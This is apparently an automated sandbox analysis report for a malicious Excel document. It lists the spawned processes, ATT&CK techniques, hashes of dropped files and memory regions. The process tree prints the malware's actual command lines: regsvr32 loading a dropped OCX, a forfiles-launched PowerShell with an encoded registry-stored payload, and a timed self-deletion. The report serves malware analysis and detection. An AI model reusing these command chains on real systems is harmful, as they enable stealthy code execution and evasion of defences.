C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Information.xlsb
2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -s C:\ProgramData\Dori.ocx
3⤵
- Process spawned unexpected child process
- Loads dropped DLL
PID:1496

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
2⤵
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
3⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lywpdnzj\lywpdnzj.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8160.tmp" "c:\Users\Admin\AppData\Local\Temp\lywpdnzj\CSC21B24D8A273C421894975F7AF478BCC.TMP"
7⤵
PID:2620

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fxyyuihv\fxyyuihv.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BD.tmp" "c:\Users\Admin\AppData\Local\Temp\fxyyuihv\CSC53CB4AAE35A242B09F72A2EFED2E6A0.TMP"
7⤵
PID:2780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\ProgramData\Dori.ocx"
2⤵
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\system32\timeout.exe
timeout /t 5
3⤵
- Delays execution with timeout.exe
PID:2880

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1096

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1580

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2248

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2248 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2300

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2512

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:3748869 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dori.ocx

MD5
745868c40e6f1d1d40ae60335417f6d7

SHA1
cfe42b4014fc22596b4305271c4a133492603349

SHA256
7a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93

SHA512
fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

MD5
a69fba04d9b13e82fb772d1b38b6054a

SHA1
f7ab8c1d32ddc58e13f65f9b8bb0cc844f164454

SHA256
733d04f9d9e1fdf85914f097cca3f8bfb3926c38a7ccf69e7c74d887abbc64ff

SHA512
6fae50c73cc08c48d5ecb6814785f82c46ded1dc00ba9a8b02a9b2bd907a10bba6015e0a5753487a12765db242162ce4f822bf5d3381a71ae2143c9f5d34669a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5
edf66cf23af8fab24dff190d8381bfb6

SHA1
26e180065ba7a953273496ae057ddf5fe67f3d47

SHA256
d504a8cc979d244e7958b51a718a3cfa31b5985a9e925f8df50e396cc277c333

SHA512
b073052c3dd2670bdb50f1f330c011ef3f34ee74ea78d62b093af07b6ab66d41c1a7e964f8dce316eddfa2b37ee148e76beb0dae53385c53857a9e231f58994a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

MD5
93b32689daacf789f2bdc1a7c230b192

SHA1
1c038e1d2b913fa364434a06121897297909413e

SHA256
e0b5b237f63410726772397a8d788bc60f754f57131c996afcced68a95c3f7b0

SHA512
6adf611145901c8d373850e66e770abf2589f06bcfddab46e7ed80e6373d49a07f13a65bb0261bd2702e0e282eff2aae4e89207b292bf626a9c468b5c053bdf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat

MD5
f73d4dda9d2efb77eab367f95df11624

SHA1
1362ccf157e35e73aa7a63e4d1a3fcc3013f751f

SHA256
bfd47a341402ac40504e141cc5084aab6827730a4976d3bb7f7af686b2f699c9

SHA512
975e8b115e0439974576d5e385c7dc05c0ecba57fe3bb6ef7854c30fd27813a54e876d7513e0ae35371d9baa1ea9430ae74f37b5aa51fa481172ebecc0b1ddc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat

MD5
eab7ffe0efdaac854efa38c6e872821d

SHA1
fb1105aebefdad2ff2db9f4a1b4ec6ddf364fa72

SHA256
cdc6037b58fd94bd4ee9924e57474f1ac21bc365bbb73353887e6039c1487529

SHA512
b62ab07c103928bb7eee003a73b5b7cf0e89f4b7696b6281c0933cfa84994168cbefa7c59333af83d6635f249bba88e30769fa9f89735cee2583b02d7a502eff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat

MD5
572514fee818f7d97b501f2e7d9f1f59

SHA1
accfde478acd3e92644002296d93474516df2f82

SHA256
a13f4acf500aa9153bbd65d81f5da98b7e3d7740ee2ef6b2ecca8e4ecab6f280

SHA512
88ae7383e1b15a0c4872c6d0ef420cfab2a2c8ee85a262dfe778516f225e1e35c0361c75c338e3b5326522b059c84c07db321a1f12b8cdd13fcbf67f0c49373f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O1R1CL99\favicon[2].ico

MD5
a976d227e5d1dcf62f5f7e623211dd1b

SHA1
a2a9dc1abdd3d888484678663928cb024c359ee6

SHA256
66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

SHA512
6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8160.tmp

MD5
b069168290219685ac851f84330eff12

SHA1
efb7c52fb24bafc3de0d31334d2ddd4a8705f48d

SHA256
0c97266a2c267a494accbe673407f838b1ab4f5b9b9561a3712a27a89301c52a

SHA512
9672a2f057ce021155bb69c3ccfd65bf561c775141a33f218a968750f26e84ff2af3cc0911fa6eb5b0b627de2acecbfb8b4a3aacec77348ecae5bc4ac953dc50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES81BD.tmp

MD5
d52bb86310d7bdedfc7cbbd8596a7edc

SHA1
a1d67543c912418572c1d4b52e2fde70e02171c0

SHA256
a46afac1888bce18182a58ecaa52615046365623eb38180ab38f23cce18db1f3

SHA512
e76d7184fd23fff419dbf9b72ef2429181d2e9b496ccd707b4c94dcc56727804230b5c07ded2674970111e659bfe2de03c3e9e57d1f2e8b36dcca92e44602d12

Download Submit
C:\Users\Admin\AppData\Local\Temp\fxyyuihv\fxyyuihv.dll

MD5
07117cb5842e08570a031eb7590829f9

SHA1
4a01a8b84bc346e6e70b3d2bb34cc3e2e23c04c4

SHA256
dc66febe3c4800e43a665aa8fc995b0a6ef1d9883ca10348a466d546daa6b8ac

SHA512
9d285af7ad9ec12bf329b8806acf0ccc4d71beb57231082556a5112064c2bc643ffc86f59804f3a086bea6d9e4e08939b87505bd6c5b429e278c78b62ceacd65

Download Submit
C:\Users\Admin\AppData\Local\Temp\lywpdnzj\lywpdnzj.dll

MD5
23f1b4c53ea272c26d895712c5981fea

SHA1
1bc28d360b3b14600028af3d223fe02901d33d5d

SHA256
ff7c067a5483c53e80fc59cc23170ca5049fb0cac10c36c76743d3ba118d2607

SHA512
49ed121a3d724e016742bc908d998dae6094444429c6e77f3cd3923f87e7c8d06ea1b53d9b5d3980f18763d16f44dec2fd385e10ad9aaf4763e5d6d275d732c0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxyyuihv\CSC53CB4AAE35A242B09F72A2EFED2E6A0.TMP

MD5
26cd0fa697193a6e7bbd77222d35a7d4

SHA1
5a1de62f54cf784e5dfea13aaf68e62bdf6baf02

SHA256
0181df31f095dbdee45eeac60c5e32745fc36059d36a6a579877ae3c51088623

SHA512
75482cdfb4ee4e104a2dc40502a631dc0a598f51014eac7f8b2677d3b89be30829630032e11e665c1e75f48c1f0161fc99c30fd32f31f1d5ea3bdb3931ac9a8d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxyyuihv\fxyyuihv.0.cs

MD5
a5043957e07dbe0dee7bb8aad13a403e

SHA1
571c9136e0e90d016dd83b24c40eadbf7186c701

SHA256
73775570d08cc971668d853274b7c9a0cfb407cf76480747b9e38542e5dc53c9

SHA512
14f98e4902059980ed8f46c72fdefeb404f14df0fa06628476d63f9bb9ed76fd6398abd4de8c1de7dfa2a8b2108c31e2b9b668acfc92958c1eecc4a0c8d656a1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxyyuihv\fxyyuihv.cmdline

MD5
e6a10d6e1004d79ade932e3df6caf976

SHA1
e36b1d75f63d06265d2aa026e2621b7369029c65

SHA256
517d3e09cb14f69367428b4778db5b0802b6b6dfbccc3fc406a12b7253305e73

SHA512
a12636a6938067b33e0a7819de719d8fe0e0823f1f48c0764d0a3912707d231b381ebe91acd156937a130441b8f7d237f68134ac5b85ab273f7249b978cf2959

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lywpdnzj\CSC21B24D8A273C421894975F7AF478BCC.TMP

MD5
4c386011f373433eda11515b7939005a

SHA1
5077f07e89e011acf9c4714b3c501820ee3b236b

SHA256
3845ff0ce55fdc78eb52b025d2c4eaf8604d84456d383d0d603d7ff5a7d34234

SHA512
12c79d8e67748f0f9df7a0b1dfe4db72d0bcaa3eced4a7c321d29bd29b6534a06303522a1d59cf51ea2ad6e9063f9c0cb693c10a03f7816f8243dc4739bebaf3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lywpdnzj\lywpdnzj.0.cs

MD5
aee5ecef6b6a9b4372991443276b71ce

SHA1
911bd26fba4c5e51423f2c6339cc267f8697f339

SHA256
90e03a7c9cb196fd260c54663a4c867f33621ac29746cd8c0a4b2aa9b390754a

SHA512
cf99d4941aa5d1a4dd3abd5ca7a4d3d19a7f497c3247fd09505e263a9a4646b81eb19d7a9312b17a00d22ca9881b6d725b76013b7dc470dcc964b77970c96cc3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lywpdnzj\lywpdnzj.cmdline

MD5
a153360e4b8f74ff1cc7df40a9677f34

SHA1
fc66e486da1ba4d304a06f8dc58703fba872ce6a

SHA256
5a9c175a696ae40d46e79c26d6130f7a7425779410fe977455bbeda20ae330dd

SHA512
3c5db319a929902cccac520dc63874b027acfb37d84124c5f8d0a7a190552abd805b263e8faa5a3f8c1508ca0aae513ba34c98ebded43f0db362316f1cc8eb55

Download Submit
\ProgramData\Dori.ocx

MD5
745868c40e6f1d1d40ae60335417f6d7

SHA1
cfe42b4014fc22596b4305271c4a133492603349

SHA256
7a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93

SHA512
fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18

Download Submit
memory/316-0-0x000007FEF5BC0000-0x000007FEF5E3A000-memory.dmp

Filesize
2.5MB

Download
memory/1072-156-0x0000000002000000-0x0000000002001000-memory.dmp

Filesize
4KB

Download
memory/1072-144-0x000000001AB90000-0x000000001AB91000-memory.dmp

Filesize
4KB

Download
memory/1072-142-0x000007FEF4D30000-0x000007FEF571C000-memory.dmp

Filesize
9.9MB

Download
memory/1072-164-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/1072-141-0x0000000000000000-mapping.dmp

Download
memory/1072-143-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/1072-166-0x00000000026E0000-0x00000000026F8000-memory.dmp

Filesize
96KB

Download
memory/1072-145-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1072-146-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/1072-148-0x000000001C3E0000-0x000000001C3E1000-memory.dmp

Filesize
4KB

Download
memory/1072-147-0x000000001B950000-0x000000001B951000-memory.dmp

Filesize
4KB

Download
memory/1156-140-0x0000000000000000-mapping.dmp

Download
memory/1496-4-0x00000000001D0000-0x00000000001E2000-memory.dmp

Filesize
72KB

Download
memory/1496-1-0x0000000000000000-mapping.dmp

Download
memory/1580-5-0x0000000000000000-mapping.dmp

Download
memory/1744-157-0x0000000000000000-mapping.dmp

Download
memory/1944-138-0x0000000000000000-mapping.dmp

Download
memory/1944-139-0x0000000000000000-mapping.dmp

Download
memory/2300-7-0x0000000000000000-mapping.dmp

Download
memory/2512-16-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-46-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-137-0x0000000006E10000-0x0000000006E33000-memory.dmp

Filesize
140KB

Download
memory/2512-135-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-101-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-106-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-13-0x0000000000000000-mapping.dmp

Download
memory/2512-111-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2512-53-0x00000000034E0000-0x00000000034E2000-memory.dmp

Filesize
8KB

Download
memory/2512-19-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-52-0x00000000034E0000-0x00000000034E2000-memory.dmp

Filesize
8KB

Download
memory/2512-36-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-34-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-39-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-41-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-44-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/2512-136-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-17-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2512-27-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/2620-152-0x0000000000000000-mapping.dmp

Download
memory/2624-149-0x0000000000000000-mapping.dmp

Download
memory/2640-15-0x0000000000000000-mapping.dmp

Download
memory/2780-160-0x0000000000000000-mapping.dmp

Download
memory/2880-167-0x0000000000000000-mapping.dmp

Download